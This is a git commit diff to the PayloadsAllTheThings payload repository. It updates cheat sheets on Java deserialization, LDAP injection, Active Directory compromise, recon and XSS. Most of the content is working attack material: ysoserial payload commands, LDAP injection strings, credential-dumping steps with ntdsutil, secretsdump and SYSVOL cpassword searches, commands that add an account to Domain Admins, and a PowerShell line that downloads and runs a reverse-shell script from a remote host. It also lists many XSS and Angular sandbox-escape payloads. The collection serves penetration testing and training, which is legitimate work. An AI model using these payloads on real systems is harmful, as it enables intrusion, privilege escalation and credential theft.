mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Refactoring XSS 0/?
This commit is contained in:
parent
30019235f8
commit
d1f6e8397d
56
Java Deserialization/README.md
Normal file
56
Java Deserialization/README.md
Normal file
@ -0,0 +1,56 @@
|
||||
# Java Deserialization
|
||||
|
||||
## Exploit
|
||||
[ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
|
||||
```
|
||||
java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
|
||||
java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
|
||||
java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin
|
||||
```
|
||||
|
||||
payload | author | dependencies | impact (if not RCE)
|
||||
------|--------|------ |------
|
||||
BeanShell1 |@pwntester, @cschneider4711 |bsh:2.0b5
|
||||
C3P0 |@mbechler |c3p0:0.9.5.2, mchange-commons-java:0.2.11
|
||||
Clojure |@JackOfMostTrades |clojure:1.8.0
|
||||
CommonsBeanutils1 |@frohoff |commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
|
||||
CommonsCollections1 |@frohoff |commons-collections:3.1
|
||||
CommonsCollections2 |@frohoff |commons-collections4:4.0
|
||||
CommonsCollections3 |@frohoff |commons-collections:3.1
|
||||
CommonsCollections4 |@frohoff |commons-collections4:4.0
|
||||
CommonsCollections5 |@matthias_kaiser, @jasinner |commons-collections:3.1
|
||||
CommonsCollections6 |@matthias_kaiser |commons-collections:3.1
|
||||
FileUpload1 |@mbechler |commons-fileupload:1.3.1, commons-io:2.4 | file uploading
|
||||
Groovy1 |@frohoff |groovy:2.3.9
|
||||
Hibernate1 |@mbechler|
|
||||
Hibernate2 |@mbechler|
|
||||
JBossInterceptors1 |@matthias_kaiser |javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
||||
JRMPClient |@mbechler|
|
||||
JRMPListener |@mbechler|
|
||||
JSON1 |@mbechler |json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
|
||||
JavassistWeld1 |@matthias_kaiser |javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
||||
Jdk7u21 |@frohoff|
|
||||
Jython1 |@pwntester, @cschneider4711 |jython-standalone:2.5.2
|
||||
MozillaRhino1 |@matthias_kaiser |js:1.7R2
|
||||
Myfaces1 |@mbechler|
|
||||
Myfaces2 |@mbechler|
|
||||
ROME |@mbechler |rome:1.0
|
||||
Spring1 |@frohoff |spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
|
||||
Spring2 |@mbechler |spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
|
||||
URLDNS |@gebl| | jre only vuln detect
|
||||
Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api:1.6.4
|
||||
|
||||
Additional tools (integration ysoserial with Burp Suite):
|
||||
- [JavaSerialKiller](https://github.com/NetSPI/JavaSerialKiller)
|
||||
- [Java Deserialization Scanner](https://github.com/federicodotta/Java-Deserialization-Scanner)
|
||||
- [Burp-ysoserial](https://github.com/summitt/burp-ysoserial)
|
||||
- [SuperSerial](https://github.com/DirectDefense/SuperSerial)
|
||||
- [SuperSerial-Active](https://github.com/DirectDefense/SuperSerial-Active)
|
||||
|
||||
JRE8u20_RCE_Gadget
|
||||
[https://github.com/pwntester/JRE8u20_RCE_Gadget](https://github.com/pwntester/JRE8u20_RCE_Gadget)
|
||||
|
||||
## Thanks to
|
||||
* [ysoserial](https://github.com/frohoff/ysoserial)
|
||||
* [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
|
||||
* [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
|
@ -2,12 +2,21 @@
|
||||
LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy.
|
||||
|
||||
## Exploitation
|
||||
Example 1.
|
||||
```
|
||||
user = *)(uid=*))(|(uid=*
|
||||
pass = password
|
||||
query = "(&(uid=*)(uid=*)) (|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))"
|
||||
```
|
||||
|
||||
Example 2
|
||||
```
|
||||
user = admin)(!(&(1=0
|
||||
pass = q))
|
||||
query = (&(uid=admin)(!(&(1=0)(userPassword=q))))
|
||||
```
|
||||
|
||||
|
||||
## Payloads
|
||||
```
|
||||
*
|
||||
|
@ -1,7 +1,12 @@
|
||||
# Active Directory Attacks
|
||||
|
||||
## Most common paths to AD compromise
|
||||
* MS14-068
|
||||
* MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)
|
||||
```bash
|
||||
Exploit Python: https://www.exploit-db.com/exploits/35474/
|
||||
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
|
||||
Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
|
||||
```
|
||||
* MS17-010 (Eternal Blue - Local Admin)
|
||||
```c
|
||||
nmap -Pn -p445 — open — max-hostgroup 3 — script smb-vuln-ms17–010 <ip_netblock>
|
||||
@ -9,10 +14,41 @@
|
||||
* Unconstrained Delegation (incl. pass-the-ticket)
|
||||
* OverPass-the-Hash (Making the most of NTLM password hashes)
|
||||
* Pivoting with Local Admin & Passwords in SYSVOL
|
||||
```c
|
||||
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
|
||||
|
||||
or
|
||||
|
||||
Metasploit: scanner/smb/smb_enumshares
|
||||
Metasploit: windows/gather/enumshares
|
||||
Metasploit: windows/gather/credentials/gpp
|
||||
```
|
||||
* Dangerous Built-in Groups Usage
|
||||
* Dumping AD Domain Credentials
|
||||
```c
|
||||
C:\>ntdsutil
|
||||
ntdsutil: activate instance ntds
|
||||
ntdsutil: ifm
|
||||
ifm: create full c:\pentest
|
||||
ifm: quit
|
||||
ntdsutil: quit
|
||||
|
||||
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
|
||||
|
||||
or
|
||||
|
||||
Metasploit : windows/gather/credentials/domain_hashdump
|
||||
```
|
||||
* Golden Tickets
|
||||
```c
|
||||
mimikatz
|
||||
kerberos::ptc tgt.bin
|
||||
```
|
||||
* Kerberoast
|
||||
```c
|
||||
https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
|
||||
https://room362.com/post/2016/kerberoast-pt1/
|
||||
```
|
||||
* Silver Tickets
|
||||
* Trust Tickets
|
||||
|
||||
@ -24,6 +60,7 @@
|
||||
* [Ranger](https://github.com/funkandwagnalls/ranger)
|
||||
* BloodHound
|
||||
* RottenPotato
|
||||
* [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer)
|
||||
|
||||
## Mimikatz
|
||||
```
|
||||
@ -58,12 +95,6 @@ Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
|
||||
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
|
||||
```
|
||||
|
||||
## PrivEsc - MS14-068
|
||||
```
|
||||
Exploit Python : https://www.exploit-db.com/exploits/35474/
|
||||
|
||||
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
|
||||
```
|
||||
|
||||
## PrivEsc - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
|
||||
```
|
||||
@ -76,13 +107,16 @@ Binary exe : https://github.com/Meatballs1/ms16-032
|
||||
Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
|
||||
```
|
||||
|
||||
## Kerberoast
|
||||
|
||||
## Local Admin to Domain Admin
|
||||
```
|
||||
https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
|
||||
https://room362.com/post/2016/kerberoast-pt1/
|
||||
net user hacker2 hacker123 /add /Domain
|
||||
net group "Domain Admins" hacker2 /add /domain
|
||||
```
|
||||
|
||||
|
||||
## Thanks to
|
||||
* [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
|
||||
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
|
||||
* [Road to DC](https://steemit.com/infosec/@austinhudson/road-to-dc-part-1)
|
||||
* [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288)
|
||||
|
@ -83,6 +83,10 @@ aquatone-gather --domain example.com
|
||||
|
||||
## Passive recon
|
||||
* Using Shodan (https://www.shodan.io/) to detect similar app
|
||||
```
|
||||
can be integrated with nmap (https://github.com/glennzw/shodan-hq-nse)
|
||||
nmap --script shodan-hq.nse --script-args 'apikey=<yourShodanAPIKey>,target=<hackme>'
|
||||
```
|
||||
|
||||
* Using The Wayback Machine (https://archive.org/web/) to detect forgotten endpoints,
|
||||
```
|
||||
@ -108,6 +112,19 @@ aquatone-gather --domain example.com
|
||||
• -iL INPUTFILE tells Nmap to use the provided file as inputs
|
||||
```
|
||||
|
||||
* CTF NMAP
|
||||
This configuration is enough to do a basic check for a CTF VM
|
||||
```bash
|
||||
nmap -sV -sC -oA ~/nmap-initial 192.168.1.1
|
||||
|
||||
-sV : Probe open ports to determine service/version info
|
||||
-sC : to enable the script
|
||||
-oA : to save the results
|
||||
|
||||
After this quick command you can add "-p-" to run a full scan while you work with the previous result
|
||||
```
|
||||
|
||||
|
||||
* Aggressive NMAP
|
||||
```bash
|
||||
nmap -A -T4 scanme.nmap.org
|
||||
@ -286,4 +303,5 @@ nikto -h http://domain.example.com
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
* http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/
|
||||
* http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/
|
||||
* [Nmap CheatSheet - HackerTarget](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/)
|
||||
|
117
README.md
117
README.md
@ -3,7 +3,19 @@ A list of useful payloads and bypasses for Web Application Security.
|
||||
Feel free to improve with your payloads and techniques !
|
||||
I <3 pull requests :)
|
||||
|
||||
# Tools
|
||||
All sections contain:
|
||||
- README.md - vulnerability description and how to exploit it
|
||||
- Intruders - a set of files to give to Burp Intruder
|
||||
- Some exploits
|
||||
|
||||
You might also like :
|
||||
- [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/)
|
||||
- [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE Exploits)
|
||||
- Shellshock
|
||||
- HeartBleed
|
||||
- Apache Struts 2
|
||||
|
||||
## Tools
|
||||
* [Kali Linux](https://www.kali.org/)
|
||||
* [Web Developper](https://addons.mozilla.org/en-Gb/firefox/addon/web-developer/)
|
||||
* [Hackbar](https://addons.mozilla.org/en-Gb/firefox/addon/hackbar/?src=search)
|
||||
@ -19,55 +31,8 @@ I <3 pull requests :)
|
||||
* [Wappalyzer](https://wappalyzer.com/download)
|
||||
* [Metasploit](https://www.metasploit.com/)
|
||||
|
||||
# Docker
|
||||
* `docker pull remnux/metasploit` - [docker-metasploit](https://hub.docker.com/r/remnux/metasploit/)
|
||||
* `docker pull paoloo/sqlmap` - [docker-sqlmap](https://hub.docker.com/r/paoloo/sqlmap/)
|
||||
* `docker pull kalilinux/kali-linux-docker` [official Kali Linux](https://hub.docker.com/r/kalilinux/kali-linux-docker/)
|
||||
* `docker pull owasp/zap2docker-stable` - [official OWASP ZAP](https://github.com/zaproxy/zaproxy)
|
||||
* `docker pull wpscanteam/wpscan` - [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/)
|
||||
|
||||
* `docker pull infoslack/dvwa` - [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/infoslack/dvwa/)
|
||||
* `docker pull danmx/docker-owasp-webgoat` - [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/)
|
||||
* `docker pull opendns/security-ninjas` - [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/)
|
||||
* `docker pull ismisepaul/securityshepherd` - [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/)
|
||||
* `docker-compose build && docker-compose up` - [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker)
|
||||
* `docker pull citizenstig/nowasp` - [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/)
|
||||
* `docker pull bkimminich/juice-shop` - [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container)
|
||||
|
||||
# More resources
|
||||
Book's list:
|
||||
* [Web Hacking 101](https://leanpub.com/web-hacking-101)
|
||||
* [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
|
||||
* [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
|
||||
* [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
|
||||
* [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE)
|
||||
* [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
|
||||
* [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
|
||||
|
||||
* [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
|
||||
* [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
|
||||
* [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
|
||||
* [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
|
||||
* [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
|
||||
* [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
|
||||
* [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
|
||||
* [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
|
||||
* [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
|
||||
|
||||
Blogs/Websites
|
||||
* http://blog.zsec.uk/101-web-testing-tooling/
|
||||
* https://blog.innerht.ml
|
||||
* https://blog.zsec.uk
|
||||
* https://www.exploit-db.com/google-hacking-database
|
||||
* https://www.arneswinnen.net
|
||||
* https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102
|
||||
|
||||
Youtube
|
||||
* [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
|
||||
* [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
|
||||
* [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
|
||||
|
||||
Practice
|
||||
## Online Challenges
|
||||
* [Hack The Box](hackthebox.eu/)
|
||||
* [Root-Me](https://www.root-me.org)
|
||||
* [Zenk-Security](https://www.zenk-security.com/epreuves.php)
|
||||
* [W3Challs](https://w3challs.com/)
|
||||
@ -80,8 +45,58 @@ Practice
|
||||
* [HackThisSite](https://hackthissite.org)
|
||||
* [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/)
|
||||
|
||||
Bug Bounty
|
||||
## Bug Bounty
|
||||
* [HackerOne](https://hackerone.com)
|
||||
* [BugCrowd](https://bugcrowd.com)
|
||||
* [Bounty Factory](https://bountyfactory.io)
|
||||
* [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/)
|
||||
|
||||
## Docker
|
||||
| Command | Link |
|
||||
| :------------- | :------------- |
|
||||
| `docker pull remnux/metasploit` | [docker-metasploit](https://hub.docker.com/r/remnux/metasploit/) |
|
||||
| `docker pull paoloo/sqlmap` | [docker-sqlmap](https://hub.docker.com/r/paoloo/sqlmap/) |
|
||||
| `docker pull kalilinux/kali-linux-docker` | [official Kali Linux](https://hub.docker.com/r/kalilinux/kali-linux-docker/) |
|
||||
| `docker pull owasp/zap2docker-stable` | [official OWASP ZAP](https://github.com/zaproxy/zaproxy) |
|
||||
| `docker pull wpscanteam/wpscan` | [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/) |
|
||||
| `docker pull infoslack/dvwa` | [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/infoslack/dvwa/) |
|
||||
| `docker pull danmx/docker-owasp-webgoat` | [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/) |
|
||||
| `docker pull opendns/security-ninjas` | [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/) |
|
||||
| `docker pull ismisepaul/securityshepherd` | [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) |
|
||||
| `docker-compose build && docker-compose up` | [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker) |
|
||||
| `docker pull citizenstig/nowasp` | [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) |
|
||||
| `docker pull bkimminich/juice-shop` | [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container) |
|
||||
|
||||
|
||||
## More resources
|
||||
### Book's list:
|
||||
* [Web Hacking 101](https://leanpub.com/web-hacking-101)
|
||||
* [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
|
||||
* [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
|
||||
* [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
|
||||
* [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE)
|
||||
* [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
|
||||
* [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
|
||||
* [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
|
||||
* [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
|
||||
* [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
|
||||
* [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
|
||||
* [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
|
||||
* [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
|
||||
* [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
|
||||
* [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
|
||||
* [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
|
||||
|
||||
### Blogs/Websites
|
||||
* http://blog.zsec.uk/101-web-testing-tooling/
|
||||
* https://blog.innerht.ml
|
||||
* https://blog.zsec.uk
|
||||
* https://www.exploit-db.com/google-hacking-database
|
||||
* https://www.arneswinnen.net
|
||||
* https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102
|
||||
|
||||
### Youtube
|
||||
* [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
|
||||
* [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
|
||||
* [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
|
||||
* [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
|
||||
|
@ -1,6 +1,14 @@
|
||||
# Cross Site Scripting
|
||||
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.
|
||||
|
||||
- [Exploit code or POC](#exploit-code-or-poc)
|
||||
- [Identify an XSS endpoint](#identify-an-xss-endpoint)
|
||||
- [XSS in HTML/Applications](#xss-in-htmlapplications)
|
||||
- [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
|
||||
- [XSS in files](#xss-in-files)
|
||||
- [Polyglot XSS](#polyglot-xss)
|
||||
- [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)
|
||||
|
||||
## Exploit code or POC
|
||||
|
||||
Cookie grabber for XSS
|
||||
@ -232,164 +240,24 @@ phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domai
|
||||
```
|
||||
|
||||
|
||||
|
||||
## XSS with Relative Path Overwrite - IE 8/9 and lower
|
||||
|
||||
You need these 3 components
|
||||
XSS in CSS
|
||||
```
|
||||
1) stored XSS that allows CSS injection. : {}*{xss:expression(open(alert(1)))}
|
||||
2) URL Rewriting.
|
||||
3) Relative addressing to CSS style sheet : ../style.css
|
||||
|
||||
```
|
||||
|
||||
A little example
|
||||
```
|
||||
http://url.example.com/index.php/[RELATIVE_URL_INSERTED_HERE]
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
|
||||
<link href="[RELATIVE_URL_INSERTED_HERE]/styles.css" rel="stylesheet" type="text/css" />
|
||||
<style>
|
||||
div {
|
||||
background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>");
|
||||
background-color: #cccccc;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
Stored XSS with CSS injection - Hello {}*{xss:expression(open(alert(1)))}
|
||||
</body>
|
||||
<body>
|
||||
<div>lol</div>
|
||||
</body>
|
||||
</html>
|
||||
```
|
||||
|
||||
Explanation of the vulnerability
|
||||
```
|
||||
The Meta element forces IE’s document mode into IE7 compat which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert.
|
||||
|
||||
A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works.
|
||||
|
||||
Demo 1 at http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php
|
||||
Demo 2 at http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3
|
||||
MultiBrowser : http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php
|
||||
|
||||
|
||||
From : http://www.thespanner.co.uk/2014/03/21/rpo/
|
||||
```
|
||||
|
||||
|
||||
## Mutated XSS for Browser IE8/IE9
|
||||
```
|
||||
<listing id=x><img src=1 onerror=alert(1)></listing>
|
||||
<script>alert(document.getElementById('x').innerHTML)</script>
|
||||
```
|
||||
IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute.
|
||||
|
||||
|
||||
## XSS in Angular
|
||||
Angular 1.6.0
|
||||
```
|
||||
{{0[a='constructor'][a]('alert(1)')()}}
|
||||
```
|
||||
|
||||
Angular 1.5.9
|
||||
```
|
||||
{{
|
||||
c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
|
||||
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
|
||||
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
|
||||
C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
|
||||
B=C(b,c,b);$evalAsync("
|
||||
astNode=pop();astNode.type='UnaryExpression';
|
||||
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
|
||||
astNode.argument={type:'Identifier',name:'foo'};
|
||||
");
|
||||
m1=B($$asyncQueue.pop().expression,null,$root);
|
||||
m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
|
||||
$eval('a(b.c)');[].push.apply=a;
|
||||
}}
|
||||
```
|
||||
|
||||
Angular 1.5.0 - 1.5.8
|
||||
```
|
||||
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
|
||||
```
|
||||
|
||||
Angular 1.4.0 - 1.4.9
|
||||
```
|
||||
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
|
||||
```
|
||||
|
||||
Angular 1.3.20
|
||||
```
|
||||
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
|
||||
```
|
||||
|
||||
Angular 1.3.19
|
||||
```
|
||||
{{
|
||||
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
|
||||
$eval('x=alert(1)//');
|
||||
}}
|
||||
```
|
||||
|
||||
Angular 1.3.3 - 1.3.18
|
||||
```
|
||||
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
|
||||
'a'.constructor.prototype.charAt=[].join;
|
||||
$eval('x=alert(1)//'); }}
|
||||
```
|
||||
|
||||
Angular 1.3.1 - 1.3.2
|
||||
```
|
||||
{{
|
||||
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
|
||||
'a'.constructor.prototype.charAt=''.valueOf;
|
||||
$eval('x=alert(1)//');
|
||||
}}
|
||||
```
|
||||
|
||||
Angular 1.3.0
|
||||
```
|
||||
{{!ready && (ready = true) && (
|
||||
!call
|
||||
? $$watchers[0].get(toString.constructor.prototype)
|
||||
: (a = apply) &&
|
||||
(apply = constructor) &&
|
||||
(valueOf = call) &&
|
||||
(''+''.toString(
|
||||
'F = Function.prototype;' +
|
||||
'F.apply = F.a;' +
|
||||
'delete F.a;' +
|
||||
'delete F.valueOf;' +
|
||||
'alert(1);'
|
||||
))
|
||||
);}}
|
||||
```
|
||||
|
||||
Angular 1.2.24 - 1.2.29
|
||||
```
|
||||
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
|
||||
```
|
||||
|
||||
Angular 1.2.19 - 1.2.23
|
||||
```
|
||||
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
|
||||
```
|
||||
|
||||
Angular 1.2.6 - 1.2.18
|
||||
```
|
||||
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
|
||||
```
|
||||
|
||||
Angular 1.2.2 - 1.2.5
|
||||
```
|
||||
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
|
||||
```
|
||||
|
||||
Angular 1.2.0 - 1.2.1
|
||||
```
|
||||
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
|
||||
```
|
||||
|
||||
Angular 1.0.1 - 1.1.5
|
||||
```
|
||||
{{constructor.constructor('alert(1)')()}}
|
||||
```
|
||||
|
||||
## Polyglot XSS
|
||||
Polyglot XSS - 0xsobky
|
||||
@ -511,6 +379,16 @@ Bypass space filter with "/" - IE/Firefox/Chrome/Safari
|
||||
<img/src='1'/onerror=alert(0)>
|
||||
```
|
||||
|
||||
Bypass space filter with 0x0c/^L
|
||||
```
|
||||
<svgonload=alert(1)>
|
||||
|
||||
|
||||
$ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
|
||||
00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c <svg.onload.=.al
|
||||
00000010: 6572 7428 3129 0c3e 0a ert(1).>.
|
||||
```
|
||||
|
||||
|
||||
Bypass document blacklist
|
||||
```
|
||||
|
110
XSS injection/XSS in Angular.md
Normal file
110
XSS injection/XSS in Angular.md
Normal file
@ -0,0 +1,110 @@
|
||||
## XSS in Angular
|
||||
Angular 1.6.0
|
||||
```
|
||||
{{0[a='constructor'][a]('alert(1)')()}}
|
